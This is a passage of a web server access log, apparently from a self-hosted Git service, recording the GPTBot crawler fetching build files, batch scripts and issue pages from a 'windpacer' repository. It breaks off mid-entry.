"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 92] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 10264] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 1111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 9780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 11716] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13176] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15273] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24303] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13923] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" -[17/Feb/2026:18:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" -[17/Feb/2026:18:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10105] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:18:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 